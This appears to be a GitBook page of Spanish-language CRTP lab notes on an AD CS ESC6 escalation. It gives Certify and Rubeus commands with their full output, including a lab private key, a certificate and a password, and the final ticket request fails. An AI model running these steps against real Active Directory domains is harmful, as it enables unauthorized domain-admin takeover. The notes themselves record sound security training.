šŸ’»
Infrastructure Notes
  • Inicio
  • Estructura del Sitio (Organizacion)
  • Que es el directorio activo?
  • Como Instalar tu directorio activo?
  • Elementos
    • Dominio
    • Ɓrbol
    • Bosque
    • Unidad Organizativa
  • Base de datos
  • Objetos
    • Usuarios
    • Recursos
    • Servicios
  • Protocolos de
    • Resolucion
    • Autenticacion
    • Comunicacion
  • Relaciones de confianzas
  • Dudas
  • Ideas
  • Videos de Pentest en AD
  • Group 1
    • CRTP Notes
      • Comandos
      • Labs
      • Learning Objective - 5
      • Learning Objective - 6
      • Learning Objective - 7
      • Learning Objective - 8 y 9
      • Learning Objective - 10
      • Learning Objective - 11
      • Learning Objective - 12
      • Learning Objective - 13
      • Learning Objective - 14
      • Learning Objective - 15
      • Learning Objective - 16
      • Learning Objective - 17
      • Learning Objective - 18
      • Learning Objective - 19
      • Learning Objective - 20
      • Learning Objective - 21
        • AD CS - ESC3
        • AD CS - ESC6
        • AD CS - ESC1
      • Learning Objective - 22
Powered by GitBook
On this page
  1. Group 1
  2. CRTP Notes
  3. Learning Objective - 21

AD CS - ESC6

Escalacion de Domain Admin

La plantilla "CA-Integration" permite la inscripciĆ³n del grupo RDPUsers. Realizamos una solicitud de un certificado para DA (o EA) como student723.

PS C:\ad\tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student723
[*] No subject name specified, using current context as subject.

[*] Template                : CA-Integration
[*] Subject                 : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName                 : administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 35

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1iZ4dT7lOMIikGv3fnyFUA0rJ7lRZIe/YqRzkxAMKQrBiw5q
MR4JHkdGaE7azxKKVEOj8MQiZCbChhJ/dfys7E/MlaPFKLEJ9QwhfV/C/wTwdrO6
prxZfFN9lbK5GfUAz1bVCwEJr5VNV+QnAaBQQdJ8OmE0/8e08Wohi1baS2vbJ0vw
3YXOhujLAMWh8D0wzW0vkp0gxve1Ca6suwkvAd0nRRvMp8OSRRRWtlouRSZvDHk+
NRYVB2hnjWxTN4SP4xcigWb1TvKV2HfMmRkcRO5kvXzz4wOTMTnBTIz0YCNvkDPh
cvfgTcLNlNFGf50ThbrlX/KVUErHV03ud6nlAQIDAQABAoIBABSqGa2WqB/V++fb
w0IdWe/jlWp743LD9p/aJpzmS4YaV5rHhU/ACjk1v4GJOmwI6fg/nq44/uiTJOoz
FsGX5EfZW3CFIR1QGBnhVcn3V6WsIFgT98rnGet5UwEDAgGTNsTLKDurmferfI8i
oPDzO0teuEYZ4zdbWgaBq0L62o20aXSnP97t0PHRkfz9levHKXxZ9xbOri2oRsyN
/nJndXYXLl+5HmtzAY8NiFKWzxrVjRWuzD01ezkSjo9CvXFw6Wj9ObUi0IZh8lR7
bl2oDjoF3+9NyJonLDsXlF3iLnuSQBszRsXOL1xCIoUnuw3C+9pLMw7/VF+4m+zt
BFxy79ECgYEA811MGZzvXUtQY6Mj+EIabbaPYSYamZKRkWtp6RKpFPUQ5+vaAQws
Zi/ZRlNvj69iDjZkQ505nCisEO6WbH/F2mIJgiOmc83DmULLnpZjFir6yewWcFt/
/VGduR2ThxpCurzWUyjcyDWQ79EQoR4CaHDF2c9BI/dcxeGjs4esKXcCgYEA4UTe
yZAGAyPaUG5TqPoyF/TihlZBO7wnIfch1FHU2oN2FfDWWpAJSXgzzYHg/1kucOXL
EHPYPqLqA/daz7emTh7SQOXobv84rFWkSsnwpQaESNZZucasSyKnOf8amzAmghXH
X5yl0JZvH19E7bNK79jsFa1rMZaVH9bHz1yCA0cCgYBlCpVwBPJ037IuzCtBBeEH
MEbzZOiiXnJF2D0O4gqFgwJT6F6JFM7SVod1ZWrqUzz4/ag/UmX66gAWv5iAz8QL
2axs9fREHGhbl5oG7BWTvKCHeZgPak4HlP1RQHBiJYsTERhDSrHwBh15FGo9GsKR
LlFXD2/SSP+hwP9AqNHYHQKBgQDSN5jH9DUIHR8Py8UafVDd9lKmFjwN6ImEMsFJ
B4xg1ikOVI9UN/HSs+9zqe4znB+wj2CuW8zCtvk29k+yY6k4YZ7HnUUIv/c9KzaD
7Gs7NReheRaGPRZvj0kK4DsN8yMcZgKGAQLj4l6Uoi0KvTQDGyVFHW5Y+jLzYVVY
9vUE5QKBgEsYnROcFB9NTQmXrM61QjbbNlp7OSKrsphTa666t2JtptFSU6Y/eAuY
eZO/2Npw4dDJfNphoXY3M73uW3RRcZRB8B+1k09K41ZrNf9EBJ1kYBz5b6+4rYIp
Tn3MP+gmVNotd9t+Yr4a3ruPQEenjdz5oGV8w1ROofJpYado9sU0
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGsjCCBZqgAwIBAgITFQAAACMNkAZZnzrqQQAAAAAAIzANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw
MzA1MThaFw0yNTAzMDUwMzA1MThaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1iZ4dT7lOMIikGv3fnyFUA0rJ7lR
ZIe/YqRzkxAMKQrBiw5qMR4JHkdGaE7azxKKVEOj8MQiZCbChhJ/dfys7E/MlaPF
KLEJ9QwhfV/C/wTwdrO6prxZfFN9lbK5GfUAz1bVCwEJr5VNV+QnAaBQQdJ8OmE0
/8e08Wohi1baS2vbJ0vw3YXOhujLAMWh8D0wzW0vkp0gxve1Ca6suwkvAd0nRRvM
p8OSRRRWtlouRSZvDHk+NRYVB2hnjWxTN4SP4xcigWb1TvKV2HfMmRkcRO5kvXzz
4wOTMTnBTIz0YCNvkDPhcvfgTcLNlNFGf50ThbrlX/KVUErHV03ud6nlAQIDAQAB
o4IDXjCCA1owPAYJKwYBBAGCNxUHBC8wLQYlKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/gsD8U/nBbgIBZAIBDDApBgNVHSUEIjAgBggrBgEFBQcDAgYIKwYB
BQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcVCgQo
MCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkqhkiG
9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4D
AgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHic4MQ6+euKJmU7XcLg4tIL3Jd5MCgG
A1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1UdIwQY
MBaAFNH+jQqn+rQynzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSG
gcFsZGFwOi8vL0NOPW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxD
Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVS
ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
aW50MIHLBggrBgEFBQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NO
PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIw
U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNv
cnAsREM9bG9jYWw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
ZmljYXRpb25BdXRob3JpdHkwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIB
oDAELlMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2ODg2NDgtMTM2
MDMwDQYJKoZIhvcNAQELBQADggEBAGugedCoeY8SyrO7gcdDgpDU9xHFsFqwZpoM
Vez6wEtl0fQCrwg4gpUk/UKISkFIfb3Pzns7QzQEkBDI8Yyg26bnGKAhcqsAYh+r
7oyppzlm3UbNb6XMp2DjBV/PfRKrRx5vPINeFJJ+pRH5e48X9+3QS0eV/hK6omeL
Rb/PTdkhrHzVvIvh8miJBw81d5dA6KV+qgdevE4vGcYZpx0OFKNjQDkJdSMzlXJb
nAB2F69SBq6dzDy9NO0uTl2Cqm5ETqhsQsA3d4rTy4FOc9vueF5+ZDuEfu6Eozwe
zD286p2cxPHQQgM56iczoMui94++W+DQT236eJ0L/JCTASz/rwg=
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:10.4666049

PS C:\ad\tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc6.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

PS C:\ad\tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:SecretPass@123 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88

[X] KRB-ERROR (66) : KDC_ERR_CERTIFICATE_MISMATCH

PS C:\ad\tools\openssl>

PreviousAD CS - ESC3NextAD CS - ESC1

Last updated 1 year ago